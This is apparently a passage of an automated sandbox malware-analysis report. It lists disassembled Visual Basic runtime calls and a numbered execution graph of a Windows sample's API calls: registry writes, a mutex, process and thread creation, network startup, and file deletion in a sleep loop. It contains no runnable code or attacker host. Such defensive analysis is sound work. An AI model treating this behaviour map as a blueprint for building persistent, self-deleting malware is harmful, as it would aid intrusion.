              • __vbaUbound.MSVBVM60(00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401176), ref: 0040306D
              • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,?,00000000), ref: 0040307F
              • __vbaUbound.MSVBVM60(00000001,00000000), ref: 0040308D
              • __vbaLbound.MSVBVM60(00000001), ref: 00403097
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004030C0
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004030CB
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004030EF
              • __vbaGenerateBoundsError.MSVBVM60 ref: 004030F7
              • __vbaUI1I2.MSVBVM60 ref: 0040312B
              • __vbaAryMove.MSVBVM60(?,?), ref: 00403150
              • __vbaAryDestruct.MSVBVM60(00000000,?,00403177), ref: 00403170
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$BoundsErrorGenerate$LboundUbound$DestructMoveRedim
              • String ID:
              • API String ID: 2936173189-0
              • Opcode ID: 7c7337924702c23539db97849301f3ba1c987496ace2d8067c73c12960cede05
              • Instruction ID: 6f87bdb0b3a264d497bc3203e3e4838ae7065c3179f4311bd022fec67bbe7a83
              • Opcode Fuzzy Hash: 7c7337924702c23539db97849301f3ba1c987496ace2d8067c73c12960cede05
              • Instruction Fuzzy Hash: FE417174A01305AFD700DFA4C985EAABBB8FB08701F108026EA45FB3D1D7B49981CBA5

              Control-flow Graph

              APIs
              • __vbaAryUnlock.MSVBVM60(?), ref: 0040385C
              • __vbaAryUnlock.MSVBVM60(?), ref: 00403862
              • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00403872
              • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00403886
              Memory Dump Source
              • Source File: 00000000.00000002.1240769359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1240757536.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_1vQ6RSHmz5.jbxd
              Similarity
              • API ID: __vba$FreeListUnlock
              • String ID:
              • API String ID: 778697622-0
              • Opcode ID: c7f26a1df70543aeacd1234c2a1075897c1c92adf2c82f8f71df3ff6b6c43045
              • Instruction ID: 7f602065945e14cb01f95a93fbcc014acd9e52a959cb9d15d16ca656b10f879e
              • Opcode Fuzzy Hash: c7f26a1df70543aeacd1234c2a1075897c1c92adf2c82f8f71df3ff6b6c43045
              • Instruction Fuzzy Hash: A5E0A5B2D0025EAFEB05DBE0DE84EEDB73CEB98704F104519B606A6454E6706B098B60

              Execution Graph

              Execution Coverage:2.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:5.8%
              Total number of Nodes:950
              Total number of Limit Nodes:38
              execution_graph 47259 434887 47260 434893 ___scrt_is_nonwritable_in_current_image 47259->47260 47286 434596 47260->47286 47262 43489a 47264 4348c3 47262->47264 47584 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47262->47584 47271 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47264->47271 47585 444251 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47264->47585 47266 4348dc 47268 4348e2 ___scrt_is_nonwritable_in_current_image 47266->47268 47586 4441f5 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47266->47586 47269 434962 47297 434b14 47269->47297 47271->47269 47587 4433e7 36 API calls 6 library calls 47271->47587 47279 434984 47280 43498e 47279->47280 47589 44341f 28 API calls _Atexit 47279->47589 47282 434997 47280->47282 47590 4433c2 28 API calls _Atexit 47280->47590 47591 43470d 13 API calls 2 library calls 47282->47591 47285 43499f 47285->47268 47287 43459f 47286->47287 47592 434c52 IsProcessorFeaturePresent 47287->47592 47289 4345ab 47593 438f31 10 API calls 4 library calls 47289->47593 47291 4345b0 47296 4345b4 47291->47296 47594 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47291->47594 47293 4345bd 47294 4345cb 47293->47294 47595 438f5a 8 API calls 3 library calls 47293->47595 47294->47262 47296->47262 47596 436e90 47297->47596 47300 434968 47301 4441a2 47300->47301 47598 44f059 47301->47598 47303 434971 47306 40e9c5 47303->47306 47304 4441ab 47304->47303 47602 446815 36 API calls 47304->47602 47604 41cb50 LoadLibraryA GetProcAddress 47306->47604 47308 40e9e1 GetModuleFileNameW 47609 40f3c3 47308->47609 47310 40e9fd 47624 4020f6 47310->47624 47313 4020f6 28 API calls 47314 40ea1b 47313->47314 47630 41be1b 47314->47630 47318 40ea2d 47656 401e8d 47318->47656 47320 40ea36 47321 40ea93 47320->47321 47322 40ea49 47320->47322 47662 401e65 47321->47662 47920 40fbb3 118 API calls 47322->47920 47325 40eaa3 47329 401e65 22 API calls 47325->47329 47326 40ea5b 47327 401e65 22 API calls 47326->47327 47328 40ea67 47327->47328 47921 410f37 36 API calls __EH_prolog 47328->47921 47330 40eac2 47329->47330 47667 40531e 47330->47667 47333 40ead1 47672 406383 47333->47672 47334 40ea79 47922 40fb64 78 API calls 47334->47922 47338 40ea82 47923 40f3b0 71 API calls 47338->47923 47344 401fd8 11 API calls 47346 40eefb 47344->47346 47345 401fd8 11 API calls 47347 40eafb 47345->47347 47588 4432f6 GetModuleHandleW 47346->47588 47348 401e65 22 API calls 47347->47348 47349 40eb04 47348->47349 47689 401fc0 47349->47689 47351 40eb0f 47352 401e65 22 API calls 47351->47352 47353 40eb28 47352->47353 47354 401e65 22 API calls 47353->47354 47355 40eb43 47354->47355 47356 40ebae 47355->47356 47924 406c1e 47355->47924 47357 401e65 22 API calls 47356->47357 47363 40ebbb 47357->47363 47359 40eb70 47360 401fe2 28 API calls 47359->47360 47361 40eb7c 47360->47361 47364 401fd8 11 API calls 47361->47364 47362 40ec02 47693 40d069 47362->47693 47363->47362 47369 413549 3 API calls 47363->47369 47366 40eb85 47364->47366 47929 413549 RegOpenKeyExA 47366->47929 47367 40ec08 47368 40ea8b 47367->47368 47696 41b2c3 47367->47696 47368->47344 47375 40ebe6 47369->47375 47373 40f34f 48009 4139a9 30 API calls 47373->48009 47374 40ec23 47376 40ec76 47374->47376 47933 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47374->47933 47375->47362 47932 4139a9 30 API calls 47375->47932 47378 401e65 22 API calls 47376->47378 47381 40ec7f 47378->47381 47390 40ec90 47381->47390 47391 40ec8b 47381->47391 47382 40ec3e 47384 40ec42 47382->47384 47385 40ec4c 47382->47385 47383 40f365 48010 412475 65 API calls ___scrt_fastfail 47383->48010 47934 407738 30 API calls 47384->47934 47388 401e65 22 API calls 47385->47388 47400 40ec55 47388->47400 47389 40f36f 47393 41bc5e 28 API calls 47389->47393 47396 401e65 22 API calls 47390->47396 47937 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47391->47937 47392 40ec47 47935 407260 98 API calls 47392->47935 47397 40f37f 47393->47397 47398 40ec99 47396->47398 47816 413a23 RegOpenKeyExW 47397->47816 47713 41bc5e 47398->47713 47400->47376 47404 40ec71 47400->47404 47401 40eca4 47717 401f13 47401->47717 47936 407260 98 API calls 47404->47936 47408 401f09 11 API calls 47409 40f39c 47408->47409 47411 401f09 11 API calls 47409->47411 47413 40f3a5 47411->47413 47819 40dd42 47413->47819 47414 401e65 22 API calls 47415 40ecc1 47414->47415 47419 401e65 22 API calls 47415->47419 47421 40ecdb 47419->47421 47420 40f3af 47422 401e65 22 API calls 47421->47422 47423 40ecf5 47422->47423 47424 401e65 22 API calls 47423->47424 47425 40ed0e 47424->47425 47426 401e65 22 API calls 47425->47426 47457 40ed7b 47425->47457 47432 40ed23 _wcslen 47426->47432 47427 40ed8a 47428 40ed93 47427->47428 47456 40ee0f ___scrt_fastfail 47427->47456 47429 401e65 22 API calls 47428->47429 47430 40ed9c 47429->47430 47433 401e65 22 API calls 47430->47433 47431 40ef06 ___scrt_fastfail 47998 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47431->47998 47434 401e65 22 API calls 47432->47434 47432->47457 47435 40edae 47433->47435 47436 40ed3e 47434->47436 47438 401e65 22 API calls 47435->47438 47440 401e65 22 API calls 47436->47440 47439 40edc0 47438->47439 47443 401e65 22 API calls 47439->47443 47441 40ed53 47440->47441 47938 40da34 47441->47938 47442 40ef51 47444 401e65 22 API calls 47442->47444 47445 40ede9 47443->47445 47446 40ef76 47444->47446 47451 401e65 22 API calls 47445->47451 47739 402093 47446->47739 47449 401f13 28 API calls 47450 40ed72 47449->47450 47453 401f09 11 API calls 47450->47453 47454 40edfa 47451->47454 47453->47457 47996 40cdf9 45 API calls _wcslen 47454->47996 47455 40ef88 47745 41376f RegCreateKeyA 47455->47745 47729 413947 47456->47729 47457->47427 47457->47431 47462 40eea3 ctype 47466 401e65 22 API calls 47462->47466 47463 40ee0a 47463->47456 47464 401e65 22 API calls 47465 40efaa 47464->47465 47751 43baac 47465->47751 47467 40eeba 47466->47467 47467->47442 47471 40eece 47467->47471 47470 40efc1 47999 41cd9b 87 API calls ___scrt_fastfail 47470->47999 47473 401e65 22 API calls 47471->47473 47472 40efe4 47476 402093 28 API calls 47472->47476 47474 40eed7 47473->47474 47477 41bc5e 28 API calls 47474->47477 47479 40eff9 47476->47479 47480 40eee3 47477->47480 47478 40efc8 CreateThread 47478->47472 48497 41d45d 10 API calls 47478->48497 47481 402093 28 API calls 47479->47481 47997 40f474 104 API calls 47480->47997 47483 40f008 47481->47483 47755 41b4ef 47483->47755 47484 40eee8 47484->47442 47486 40eeef 47484->47486 47486->47368 47488 401e65 22 API calls 47489 40f019 47488->47489 47490 401e65 22 API calls 47489->47490 47491 40f02b 47490->47491 47492 401e65 22 API calls 47491->47492 47493 40f04b 47492->47493 47494 43baac _strftime 40 API calls 47493->47494 47495 40f058 47494->47495 47496 401e65 22 API calls 47495->47496 47497 40f063 47496->47497 47498 401e65 22 API calls 47497->47498 47499 40f074 47498->47499 47500 401e65 22 API calls 47499->47500 47501 40f089 47500->47501 47502 401e65 22 API calls 47501->47502 47503 40f09a 47502->47503 47504 40f0a1 StrToIntA 47503->47504 47779 409de4 47504->47779 47507 401e65 22 API calls 47508 40f0bc 47507->47508 47509 40f101 47508->47509 47510 40f0c8 47508->47510 47512 401e65 22 API calls 47509->47512 48000 4344ea 22 API calls 2 library calls 47510->48000 47514 40f111 47512->47514 47513 40f0d1 47515 401e65 22 API calls 47513->47515 47518 40f159 47514->47518 47519 40f11d 47514->47519 47516 40f0e4 47515->47516 47517 40f0eb CreateThread 47516->47517 47517->47509 48500 419fb4 103 API calls 2 library calls 47517->48500 47521 401e65 22 API calls 47518->47521 48001 4344ea 22 API calls 2 library calls 47519->48001 47522 40f162 47521->47522 47526 40f1cc 47522->47526 47527 40f16e 47522->47527 47523 40f126 47524 401e65 22 API calls 47523->47524 47525 40f138 47524->47525 47530 40f13f CreateThread 47525->47530 47528 401e65 22 API calls 47526->47528 47529 401e65 22 API calls 47527->47529 47531 40f1d5 47528->47531 47532 40f17e 47529->47532 47530->47518 48499 419fb4 103 API calls 2 library calls 47530->48499 47533 40f1e1 47531->47533 47534 40f21a 47531->47534 47535 401e65 22 API calls 47532->47535 47537 401e65 22 API calls 47533->47537 47804 41b60d 47534->47804 47538 40f193 47535->47538 47540 40f1ea 47537->47540 48002 40d9e8 31 API calls 47538->48002 47545 401e65 22 API calls 47540->47545 47541 401f13 28 API calls 47542 40f22e 47541->47542 47544 401f09 11 API calls 47542->47544 47547 40f237 47544->47547 47548 40f1ff 47545->47548 47546 40f1a6 47549 401f13 28 API calls 47546->47549 47550 40f240 SetProcessDEPPolicy 47547->47550 47551 40f243 CreateThread 47547->47551 47556 43baac _strftime 40 API calls 47548->47556 47552 40f1b2 47549->47552 47550->47551 47554 40f264 47551->47554 47555 40f258 CreateThread 47551->47555 48468 40f7a7 47551->48468 47553 401f09 11 API calls 47552->47553 47557 40f1bb CreateThread 47553->47557 47558 40f279 47554->47558 47559 40f26d CreateThread 47554->47559 47555->47554 48495 4120f7 138 API calls 47555->48495 47560 40f20c 47556->47560 47557->47526 48496 401be9 50 API calls _strftime 47557->48496 47561 40f2cc 47558->47561 47563 402093 28 API calls 47558->47563 47559->47558 48498 4126db 38 API calls ___scrt_fastfail 47559->48498 48003 40c162 7 API calls 47560->48003 48005 4134ff RegOpenKeyExA 47561->48005 47564 40f29c 47563->47564 48004 4052fd 28 API calls 47564->48004 47569 40f2ed 47571 41bc5e 28 API calls 47569->47571 47573 40f2fd 47571->47573 48008 41361b 31 API calls 47573->48008 47578 40f313 47579 401f09 11 API calls 47578->47579 47582 40f31e 47579->47582 47580 40f346 DeleteFileW 47581 40f34d 47580->47581 47580->47582 47581->47389 47582->47389 47582->47580 47583 40f334 Sleep 47582->47583 47583->47582 47584->47262 47585->47266 47586->47271 47587->47269 47588->47279 47589->47280 47590->47282 47591->47285 47592->47289 47593->47291 47594->47293 47595->47296 47597 434b27 GetStartupInfoW 47596->47597 47597->47300 47599 44f06b 47598->47599 47600 44f062 47598->47600 47599->47304 47603 44ef58 49 API calls 5 library calls 47600->47603 47602->47304 47603->47599 47605 41cb8f LoadLibraryA GetProcAddress 47604->47605 47606 41cb7f GetModuleHandleA GetProcAddress 47604->47606 47607 41cbb8 44 API calls 47605->47607 47608 41cba8 LoadLibraryA GetProcAddress 47605->47608 47606->47605 47607->47308 47608->47607 48011 41b4a8 FindResourceA 47609->48011 47613 40f3ed ctype 48023 4020b7 47613->48023 47616 401fe2 28 API calls 47617 40f413 47616->47617 47618 401fd8 11 API calls 47617->47618 47619 40f41c 47618->47619 47620 43bd51 new 21 API calls 47619->47620 47621 40f42d ctype 47620->47621 48029 406dd8 47621->48029 47623 40f460 47623->47310 47625 40210c 47624->47625 47626 4023ce 11 API calls 47625->47626 47627 402126 47626->47627 47628 402569 28 API calls 47627->47628 47629 402134 47628->47629 47629->47313 48066 4020df 47630->48066 47632 41be2e 47635 41bea0 47632->47635 47643 401fe2 28 API calls 47632->47643 47647 401fd8 11 API calls 47632->47647 47651 41be9e 47632->47651 48070 4041a2 28 API calls 47632->48070 48071 41ce34 28 API calls 47632->48071 47633 401fd8 11 API calls 47634 41bed0 47633->47634 47636 401fd8 11 API calls 47634->47636 48072 4041a2 28 API calls 47635->48072 47638 41bed8 47636->47638 47641 401fd8 11 API calls 47638->47641 47640 41beac 47642 401fe2 28 API calls 47640->47642 47644 40ea24 47641->47644 47645 41beb5 47642->47645 47643->47632 47652 40fb17 47644->47652 47646 401fd8 11 API calls 47645->47646 47648 41bebd 47646->47648 47647->47632 48073 41ce34 28 API calls 47648->48073 47651->47633 47653 40fb23 47652->47653 47655 40fb2a 47652->47655 48074 402163 11 API calls 47653->48074 47655->47318 47657 402163 47656->47657 47661 40219f 47657->47661 48075 402730 11 API calls 47657->48075 47659 402184 48076 402712 11 API calls std::_Deallocate 47659->48076 47661->47320 47663 401e6d 47662->47663 47664 401e75 47663->47664 48077 402158 22 API calls 47663->48077 47664->47325 47668 4020df 11 API calls 47667->47668 47669 40532a 47668->47669 48078 4032a0 47669->48078 47671 405346 47671->47333 48083 4051ef 47672->48083 47674 406391 48087 402055 47674->48087 47677 401fe2 47678 401ff1 47677->47678 47685 402039 47677->47685 47679 4023ce 11 API calls 47678->47679 47680 401ffa 47679->47680 47681 402015 47680->47681 47682 40203c 47680->47682 48121 403098 28 API calls 47681->48121 47683 40267a 11 API calls 47682->47683 47683->47685 47686 401fd8 47685->47686 47687 4023ce 11 API calls 47686->47687 47688 401fe1 47687->47688 47688->47345 47690 401fd2 47689->47690 47691 401fc9 47689->47691 47690->47351 48122 4025e0 28 API calls 47691->48122 48123 401fab 47693->48123 47695 40d073 CreateMutexA GetLastError 47695->47367 48124 41bfb7 47696->48124 47701 401fe2 28 API calls 47702 41b2ff 47701->47702 47703 401fd8 11 API calls 47702->47703 47704 41b307 47703->47704 47705 4135a6 31 API calls 47704->47705 47707 41b35d 47704->47707 47706 41b330 47705->47706 47708 41b33b StrToIntA 47706->47708 47707->47374 47709 41b349 47708->47709 47712 41b352 47708->47712 48132 41cf69 22 API calls 47709->48132 47711 401fd8 11 API calls 47711->47707 47712->47711 47714 41bc72 47713->47714 48133 40b904 47714->48133 47716 41bc7a 47716->47401 47718 401f22 47717->47718 47725 401f6a 47717->47725 47719 402252 11 API calls 47718->47719 47720 401f2b 47719->47720 47721 401f6d 47720->47721 47722 401f46 47720->47722 48166 402336 47721->48166 48165 40305c 28 API calls 47722->48165 47726 401f09 47725->47726 47727 402252 11 API calls 47726->47727 47728 401f12 47727->47728 47728->47414 47730 413965 47729->47730 47731 406dd8 28 API calls 47730->47731 47732 41397a 47731->47732 47733 4020f6 28 API calls 47732->47733 47734 41398a 47733->47734 47735 41376f 14 API calls 47734->47735 47736 413994 47735->47736 47737 401fd8 11 API calls 47736->47737 47738 4139a1 47737->47738 47738->47462 47740 40209b 47739->47740 47741 4023ce 11 API calls 47740->47741 47742 4020a6 47741->47742 48170 4024ed 47742->48170 47746 4137bf 47745->47746 47747 413788 47745->47747 47748 401fd8 11 API calls 47746->47748 47750 41379a RegSetValueExA RegCloseKey 47747->47750 47749 40ef9e 47748->47749 47749->47464 47750->47746 47752 43bac5 _strftime 47751->47752 48174 43ae03 47752->48174 47754 40efb7 47754->47470 47754->47472 47756 41b5a0 47755->47756 47757 41b505 GetLocalTime 47755->47757 47759 401fd8 11 API calls 47756->47759 47758 40531e 28 API calls 47757->47758 47761 41b547 47758->47761 47760 41b5a8 47759->47760 47762 401fd8 11 API calls 47760->47762 47763 406383 28 API calls 47761->47763 47764 40f00d 47762->47764 47765 41b553 47763->47765 47764->47488 48202 402f10 47765->48202 47768 406383 28 API calls 47769 41b56b 47768->47769 48207 407200 77 API calls 47769->48207 47771 41b579 47772 401fd8 11 API calls 47771->47772 47773 41b585 47772->47773 47774 401fd8 11 API calls 47773->47774 47775 41b58e 47774->47775 47776 401fd8 11 API calls 47775->47776 47777 41b597 47776->47777 47778 401fd8 11 API calls 47777->47778 47778->47756 47780 409e02 _wcslen 47779->47780 47781 409e24 47780->47781 47782 409e0d 47780->47782 47784 40da34 31 API calls 47781->47784 47783 40da34 31 API calls 47782->47783 47785 409e15 47783->47785 47786 409e2c 47784->47786 47787 401f13 28 API calls 47785->47787 47788 401f13 28 API calls 47786->47788 47803 409e1f 47787->47803 47789 409e3a 47788->47789 47790 401f09 11 API calls 47789->47790 47791 409e42 47790->47791 48226 40915b 28 API calls 47791->48226 47792 401f09 11 API calls 47794 409e79 47792->47794 48211 40a109 47794->48211 47795 409e54 48227 403014 47795->48227 47800 401f13 28 API calls 47801 409e69 47800->47801 47802 401f09 11 API calls 47801->47802 47802->47803 47803->47792 47805 41b630 GetUserNameW 47804->47805 48263 40417e 47805->48263 47810 403014 28 API calls 47811 41b672 47810->47811 47812 401f09 11 API calls 47811->47812 47813 41b67b 47812->47813 47814 401f09 11 API calls 47813->47814 47815 40f223 47814->47815 47815->47541 47817 40f392 47816->47817 47818 413a3f RegDeleteValueW 47816->47818 47817->47408 47818->47817 47820 40dd5b 47819->47820 47821 4134ff 3 API calls 47820->47821 47822 40dd62 47821->47822 47826 40dd81 47822->47826 48358 401707 47822->48358 47824 40dd6f 48361 413877 RegCreateKeyA 47824->48361 47827 414f2a 47826->47827 47828 4020df 11 API calls 47827->47828 47829 414f3e 47828->47829 48375 41b8b3 47829->48375 47832 4020df 11 API calls 47833 414f54 47832->47833 47834 401e65 22 API calls 47833->47834 47835 414f62 47834->47835 47836 43baac _strftime 40 API calls 47835->47836 47837 414f6f 47836->47837 47838 414f81 47837->47838 47839 414f74 Sleep 47837->47839 47840 402093 28 API calls 47838->47840 47839->47838 47841 414f90 47840->47841 47842 401e65 22 API calls 47841->47842 47843 414f99 47842->47843 47844 4020f6 28 API calls 47843->47844 47845 414fa4 47844->47845 47846 41be1b 28 API calls 47845->47846 47847 414fac 47846->47847 48379 40489e WSAStartup 47847->48379 47849 414fb6 47850 401e65 22 API calls 47849->47850 47851 414fbf 47850->47851 47852 401e65 22 API calls 47851->47852 47881 41503e 47851->47881 47853 414fd8 47852->47853 47856 401e65 22 API calls 47853->47856 47854 401e65 22 API calls 47854->47881 47855 4020f6 28 API calls 47855->47881 47857 414fe9 47856->47857 47859 401e65 22 API calls 47857->47859 47858 41be1b 28 API calls 47858->47881 47860 414ffa 47859->47860 47861 401e65 22 API calls 47860->47861 47863 41500b 47861->47863 47862 406c1e 28 API calls 47862->47881 47866 401e65 22 API calls 47863->47866 47864 402f10 28 API calls 47864->47881 47865 401fe2 28 API calls 47865->47881 47867 41501c 47866->47867 47868 401e65 22 API calls 47867->47868 47869 41502e 47868->47869 48421 40473d 89 API calls 47869->48421 47871 40531e 28 API calls 47871->47881 47872 406383 28 API calls 47872->47881 47873 401fd8 11 API calls 47873->47881 47875 41518c WSAGetLastError 48422 41cae1 30 API calls 47875->48422 47880 402093 28 API calls 47880->47881 47881->47854 47881->47855 47881->47858 47881->47862 47881->47864 47881->47865 47881->47871 47881->47872 47881->47873 47881->47875 47881->47880 47883 41b4ef 80 API calls 47881->47883 47887 401e8d 11 API calls 47881->47887 47888 43baac _strftime 40 API calls 47881->47888 48380 414ee9 47881->48380 48385 40482d 47881->48385 48392 404f51 47881->48392 48407 404e26 WaitForSingleObject 47881->48407 48423 4052fd 28 API calls 47881->48423 47883->47881 47884 401e65 22 API calls 47910 41521b 47884->47910 47886 40531e 28 API calls 47886->47910 47887->47881 47889 415acf Sleep 47888->47889 47889->47881 47890 406383 28 API calls 47890->47910 47891 402093 28 API calls 47891->47910 47895 4020f6 28 API calls 47895->47910 47897 4135a6 31 API calls 47897->47910 47898 40417e 28 API calls 47898->47910 47901 401e65 22 API calls 47902 415439 GetTickCount 47901->47902 48431 41bb8e 28 API calls 47902->48431 47905 41bb8e 28 API calls 47905->47910 47908 41bd1e 28 API calls 47908->47910 47910->47881 47910->47884 47910->47886 47910->47890 47910->47891 47910->47895 47910->47897 47910->47898 47910->47901 47910->47905 47910->47908 47911 402f10 28 API calls 47910->47911 47912 402ea1 28 API calls 47910->47912 47914 401fd8 11 API calls 47910->47914 47915 401f09 11 API calls 47910->47915 47918 41b4ef 80 API calls 47910->47918 47919 415a71 CreateThread 47910->47919 48424 4048c8 97 API calls 47910->48424 48425 4145bd 51 API calls 47910->48425 48426 40905c 28 API calls 47910->48426 48427 441e81 20 API calls 47910->48427 48428 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47910->48428 48429 40dd89 6 API calls 47910->48429 48430 41bc42 28 API calls 47910->48430 48432 41bae6 GetTickCount 47910->48432 48433 41ba96 30 API calls ___scrt_fastfail 47910->48433 48434 40f8d1 29 API calls 47910->48434 48435 402f31 28 API calls 47910->48435 48436 404aa1 61 API calls ctype 47910->48436 48437 404c10 113 API calls new 47910->48437 48438 40b051 85 API calls 47910->48438 47911->47910 47912->47910 47914->47910 47915->47910 47918->47910 47919->47910 48457 41ad17 105 API calls 47919->48457 47920->47326 47921->47334 47922->47338 47925 4020df 11 API calls 47924->47925 47926 406c2a 47925->47926 47927 4032a0 28 API calls 47926->47927 47928 406c47 47927->47928 47928->47359 47930 413573 RegQueryValueExA RegCloseKey 47929->47930 47931 40eba4 47929->47931 47930->47931 47931->47356 47931->47373 47932->47362 47933->47382 47934->47392 47935->47385 47936->47376 47937->47390 48458 401f86 47938->48458 47941 40da70 48462 41b5b4 29 API calls 47941->48462 47942 40daa5 47945 41bfb7 GetCurrentProcess 47942->47945 47943 40db99 GetLongPathNameW 47947 40417e 28 API calls 47943->47947 47944 40da66 47944->47943 47948 40daaa 47945->47948 47951 40dbae 47947->47951 47952 40db00 47948->47952 47953 40daae 47948->47953 47949 40da79 47950 401f13 28 API calls 47949->47950 47954 40da83 47950->47954 47955 40417e 28 API calls 47951->47955 47956 40417e 28 API calls 47952->47956 47957 40417e 28 API calls 47953->47957 47961 401f09 11 API calls 47954->47961 47958 40dbbd 47955->47958 47959 40db0e 47956->47959 47960 40dabc 47957->47960 48465 40ddd1 28 API calls 47958->48465 47965 40417e 28 API calls 47959->47965 47966 40417e 28 API calls 47960->47966 47961->47944 47963 40dbd0 48466 402fa5 28 API calls 47963->48466 47969 40db24 47965->47969 47967 40dad2 47966->47967 48463 402fa5 28 API calls 47967->48463 47968 40dbdb 48467 402fa5 28 API calls 47968->48467 48464 402fa5 28 API calls 47969->48464 47973 40db2f 47977 401f13 28 API calls 47973->47977 47974 40dadd 47978 401f13 28 API calls 47974->47978 47975 40dbe5 47976 401f09 11 API calls 47975->47976 47979 40dbef 47976->47979 47980 40db3a 47977->47980 47981 40dae8 47978->47981 47982 401f09 11 API calls 47979->47982 47983 401f09 11 API calls 47980->47983 47984 401f09 11 API calls 47981->47984 47985 40dbf8 47982->47985 47986 40db43 47983->47986 47987 40daf1 47984->47987 47988 401f09 11 API calls 47985->47988 47989 401f09 11 API calls 47986->47989 47990 401f09 11 API calls 47987->47990 47991 40dc01 47988->47991 47989->47954 47990->47954 47992 401f09 11 API calls 47991->47992 47993 40dc0a 47992->47993 47994 401f09 11 API calls 47993->47994 47995 40dc13 47994->47995 47995->47449 47996->47463 47997->47484 47998->47442 47999->47478 48000->47513 48001->47523 48002->47546 48003->47534 48006 413520 RegQueryValueExA RegCloseKey 48005->48006 48007 40f2e4 48005->48007 48006->48007 48007->47413 48007->47569 48008->47578 48009->47383 48012 41b4c5 LoadResource LockResource SizeofResource 48011->48012 48013 40f3de 48011->48013 48012->48013 48014 43bd51 48013->48014 48016 446137 48014->48016 48015 446175 48033 4405dd 20 API calls __dosmaperr 48015->48033 48016->48015 48017 446160 HeapAlloc 48016->48017 48021 446149 __Getctype 48016->48021 48019 446173 48017->48019 48017->48021 48020 44617a 48019->48020 48020->47613 48021->48015 48021->48017 48032 442f80 7 API calls 2 library calls 48021->48032 48024 4020bf 48023->48024 48034 4023ce 48024->48034 48026 4020ca 48038 40250a 48026->48038 48028 4020d9 48028->47616 48030 4020b7 28 API calls 48029->48030 48031 406dec 48030->48031 48031->47623 48032->48021 48033->48020 48035 4023d8 48034->48035 48036 402428 48034->48036 48035->48036 48045 4027a7 11 API calls std::_Deallocate 48035->48045 48036->48026 48039 40251a 48038->48039 48040 402520 48039->48040 48041 402535 48039->48041 48046 402569 48040->48046 48056 4028e8 28 API calls 48041->48056 48044 402533 48044->48028 48045->48036 48057 402888 48046->48057 48048 40257d 48049 402592 48048->48049 48050 4025a7 48048->48050 48062 402a34 22 API calls 48049->48062 48064 4028e8 28 API calls 48050->48064 48053 40259b 48063 4029da 22 API calls 48053->48063 48055 4025a5 48055->48044 48056->48044 48058 402890 48057->48058 48059 402898 48058->48059 48065 402ca3 22 API calls 48058->48065 48059->48048 48062->48053 48063->48055 48064->48055 48067 4020e7 48066->48067 48068 4023ce 11 API calls 48067->48068 48069 4020f2 48068->48069 48069->47632 48070->47632 48071->47632 48072->47640 48073->47651 48074->47655 48075->47659 48076->47661 48080 4032aa 48078->48080 48079 4032c9 48079->47671 48080->48079 48082 4028e8 28 API calls 48080->48082 48082->48079 48084 4051fb 48083->48084 48093 405274 48084->48093 48086 405208 48086->47674 48088 402061 48087->48088 48089 4023ce 11 API calls 48088->48089 48090 40207b 48089->48090 48117 40267a 48090->48117 48094 405282 48093->48094 48095 405288 48094->48095 48096 40529e 48094->48096 48104 4025f0 48095->48104 48098 4052f5 48096->48098 48099 4052b6 48096->48099 48114 4028a4 22 API calls 48098->48114 48103 40529c 48099->48103 48113 4028e8 28 API calls 48099->48113 48103->48086 48105 402888 22 API calls 48104->48105 48106 402602 48105->48106 48107 402672 48106->48107 48109 402629 48106->48109 48116 4028a4 22 API calls 48107->48116 48112 40263b 48109->48112 48115 4028e8 28 API calls 48109->48115 48112->48103 48113->48103 48115->48112 48118 40268b 48117->48118 48119 4023ce 11 API calls 48118->48119 48120 40208d 48119->48120 48120->47677 48121->47685 48122->47690 48125 41bfc4 GetCurrentProcess 48124->48125 48126 41b2d1 48124->48126 48125->48126 48127 4135a6 RegOpenKeyExA 48126->48127 48128 4135d4 RegQueryValueExA RegCloseKey 48127->48128 48129 4135fe 48127->48129 48128->48129 48130 402093 28 API calls 48129->48130 48131 413613 48130->48131 48131->47701 48132->47712 48134 40b90c 48133->48134 48139 402252 48134->48139 48136 40b917 48143 40b92c 48136->48143 48138 40b926 48138->47716 48140 40225c 48139->48140 48141 4022ac 48139->48141 48140->48141 48150 402779 11 API calls std::_Deallocate 48140->48150 48141->48136 48144 40b966 48143->48144 48145 40b938 48143->48145 48162 4028a4 22 API calls 48144->48162 48151 4027e6 48145->48151 48149 40b942 48149->48138 48150->48141 48152 4027ef 48151->48152 48153 402851 48152->48153 48154 4027f9 48152->48154 48164 4028a4 22 API calls 48153->48164 48157 402802 48154->48157 48158 402815 48154->48158 48163 402aea 